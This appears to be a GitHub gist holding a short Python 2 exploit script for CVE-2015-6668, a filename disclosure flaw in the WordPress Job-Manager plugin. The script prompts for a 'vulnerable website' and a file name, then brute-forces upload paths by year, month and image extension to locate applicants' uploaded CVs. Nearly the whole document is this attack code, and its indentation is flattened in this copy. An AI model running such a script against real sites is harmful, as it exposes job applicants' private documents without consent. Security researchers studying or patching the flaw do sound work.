Skip to content

Instantly share code, notes, and snippets.

@DoMINAToR98
Created April 14, 2019 16:29
Show Gist options
  • Save DoMINAToR98/4ed677db5832e4b4db41c9fa48e7bdef to your computer and use it in GitHub Desktop.
Save DoMINAToR98/4ed677db5832e4b4db41c9fa48e7bdef to your computer and use it in GitHub Desktop.
import requests
print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')
filename2 = filename.replace(" ", "-")
for year in range(2017,2019):
for i in range(1,13):
for extension in {'jpeg','png','jpg'}:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
req = requests.get(URL)
if req.status_code==200:
print "[+] URL of CV found! " + URL
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment